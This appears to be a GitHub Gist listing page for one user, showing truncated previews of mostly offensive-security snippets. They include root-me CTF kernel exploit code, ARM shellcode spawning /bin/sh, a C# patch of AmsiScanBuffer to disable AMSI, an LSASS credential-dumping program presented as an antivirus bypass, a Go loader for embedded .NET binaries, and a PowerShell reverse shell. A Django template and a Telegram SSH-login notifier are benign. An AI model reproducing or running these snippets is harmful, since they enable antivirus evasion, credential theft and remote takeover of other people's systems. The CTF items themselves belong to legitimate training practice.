Skip to content

Instantly share code, notes, and snippets.

@HopHouse
HopHouse / coach_create.html
Last active July 10, 2016 10:47
inline_formset in django
{% extends "staff_base.html" %}
{% load bootstrap3 %}
{% block title %}Salamander{% endblock %}
{% block content_title %}
<h1 class="page-header">Create coach</h1>
{% endblock %}
{% block content %}
@HopHouse
HopHouse / ch1.c
Last active November 13, 2017 14:27
Ch1 root-me
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
// commit cred: c1070e80
// prepare kernel cred c10711f0
@HopHouse
HopHouse / exploit.c
Last active January 2, 2018 15:25
CH3 root-me - 64 Bits Race Condition
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <fcntl.h>
void get_shell() {
@HopHouse
HopHouse / exploit.c
Last active January 2, 2018 15:29
CH2 root-me
/*
* Rouvès Quentin - rouves.quentin@hotmail.fr
* Exploit NULL Dereference kernel module
* Exec: gcc exploit.c -static -m32 -o exploit
*/
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
@HopHouse
HopHouse / exploit.S
Last active July 31, 2018 13:02
SYSCALL ARM
.data
sh:
.asciz "//bin/sh"
result:
.word 0x00000000
.text
.global _start
@HopHouse
HopHouse / telegram_notif.sh
Last active July 9, 2019 19:56
Send Telegram noification after SSH connection
#!/bin/bash
# Edit /etc/pam.d/sshd and put the following line:
# session optional pam_exec.so /root/telegram.sh
USERID="<USER ID>"
KEY="<KEY>"
TIMEOUT="10"
URL="https://api.telegram.org/bot$KEY/sendMessage"
DATE_EXEC="$(date "+%d %b %Y %H:%M")" #Collect date & time.
public static string run()
{
IntPtr dllHandle = LoadLibrary("amsi.dll"); //load the amsi.dll
if (dllHandle == null) return "error";
//Get the AmsiScanBuffer function address
IntPtr AmsiScanbufferAddr = GetProcAddress(dllHandle, "AmsiScanBuffer");
if (AmsiScanbufferAddr == null) return "error";
IntPtr OldProtection = Marshal.AllocHGlobal(4); //pointer to store the current AmsiScanBuffer memory protection
/*
* Took from https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
*/
#include "stdafx.h"
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <TlHelp32.h>
using namespace std;
@HopHouse
HopHouse / go-sharp-loader.go
Last active August 5, 2020 22:15 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ GOOS=windows go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@HopHouse
HopHouse / powershell-reverseshell.ps1
Last active August 19, 2020 07:56
Reverse shell in Powershell retrieved on the Internet.
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;